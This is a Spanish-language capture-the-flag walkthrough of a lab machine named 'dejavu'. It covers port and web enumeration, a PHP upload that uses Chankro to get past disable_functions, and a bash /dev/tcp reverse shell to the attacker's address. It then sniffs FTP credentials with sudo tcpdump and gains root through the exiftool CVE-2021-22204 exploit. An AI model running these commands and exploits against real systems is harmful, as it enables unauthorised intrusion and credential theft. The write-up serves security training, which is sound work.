Enumeramos puertos:
❯ sudo nmap -p- -sS --min-rate 5000 -n -Pn -oG 01-allPorts 192.168.1.27
❯ nmap -sCV -p22,80 -oN 02-targeted.txt 192.168.1.27
Starting Nmap 7.94 ( https://nmap.org ) at 2024-04-13 13:09 -04
Nmap scan report for 192.168.1.27
Host is up (0.00030s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48:8f:5b:43:62:a1:5b:41:6d:7b:6e:55:27:bd:e1:67 (RSA)
| 256 10:17:d6:76:95:d0:9c:cc:ad:6f:20:7d:33:4a:27:4c (ECDSA)
|_ 256 12:72:23:de:ef:28:28:9e:e0:12:ae:5f:37:2e:ee:25 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.57 secondsEnumeramos con gobuster:
❯ gobuster dir -u 'http://192.168.1.27' -w ~/Documentos/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html,jpg,jpeg,gif,png,sql,sh,pdf -r
...
/index.html (Status: 200) [Size: 10918]
/info.php (Status: 200) [Size: 69947]
...En el código de /info.php hay una pista:
<!-- /S3cR3t -->/S3cR3t tiene un formulario de subida y un subdirectorio files. La subida de .php/.phtml se acepta, pero el disable_functions bloquea la ejecución, así que usamos Chankro para bypassearlo (vía LD_PRELOAD):
❯ cat rev.sh
bash -c 'bash -i >& /dev/tcp/192.168.1.10/1234 0>&1'
❯ chankro3 --arch 64 --input rev.sh --output pwned.phtml --path /var/www/html/.HowToEliminateTheTenMostCriticalInternetSecurityThreats/S3cR3t/files/
-=[ Chankro ]=-
-={ @TheXC3LL }=-
[+] Binary file: rev.sh
[+] Architecture: x64
[+] Final PHP: pwned.phtml
[+] File created!Subimos el .phtml y accedemos a http://192.168.1.27/S3cR3t/files/pwned.phtml:
❯ ncat -nlvp 1234
Ncat: Version 7.94 ( https://nmap.org/ncat )
Ncat: Listening on [::]:1234
Ncat: Listening on 0.0.0.0:1234
id
Ncat: Connection from 192.168.1.27:35762.
bash: cannot set terminal process group (750): Inappropriate ioctl for device
bash: no job control in this shell
<nMostCriticalInternetSecurityThreats/S3cR3t/files$Para escalar, revisamos sudo -l:
<nMostCriticalInternetSecurityThreats/S3cR3t/files$ sudo -l
...
User www-data may run the following commands on dejavu:
(robert) NOPASSWD: /usr/sbin/tcpdumpCon pspy64 vemos un script auth.sh que establece una conexión FTP local periódica:
...
2024/04/13 18:35:01 CMD: UID=1000 PID=2386 | /bin/sh /home/robert/auth.sh
2024/04/13 18:35:01 CMD: UID=65534 PID=2388 | /usr/sbin/vsftpd /etc/vsftpd.conf
...Usamos tcpdump (como robert) para capturar el tráfico FTP en loopback y obtener las credenciales:
www-data@dejavu:/home$ sudo -u robert tcpdump -i lo port ftp
...
length 13: FTP: USER robert
length 18: FTP: PASS 9737bo0hFx4
...Cambiamos al usuario robert y obtenemos la primera flag:
www-data@dejavu:/home$ su robert
su robert
Password: 9737bo0hFx4
whoami
robertRevisamos sudo -l como robert:
robert@dejavu:~$ sudo -l
...
User robert may run the following commands on dejavu:
(root) NOPASSWD: /usr/local/bin/exiftoolLa versión de exiftool (12.23) es vulnerable a RCE (CVE-2021-22204):
robert@dejavu:/tmp$ exiftool -ver
12.23
❯ searchsploit exiftool
...
ExifTool 12.23 - Arbitrary Code Execution | linux/local/50911.py
...Usamos el exploit de convisolabs/CVE-2021-22204-exiftool para generar un .djvu malicioso y lo procesamos como root:
robert@dejavu:/tmp$ python3 exploit.py
Config file not found
Warning: Sorry, HasselbladExif is not writable
Nothing to do.
robert@dejavu:/tmp$ ls
exploit.djvu exploit.py payload payload.bzz
robert@dejavu:/tmp$ sudo -u root exiftool ./exploit.djvu
❯ ncat -nlvp 4321
Ncat: Version 7.94 ( https://nmap.org/ncat )
Ncat: Listening on [::]:4321
Ncat: Listening on 0.0.0.0:4321
Ncat: Connection from 192.168.1.27:58826.
root@dejavu:/tmp#Obtenemos nuestra flag.
Fin.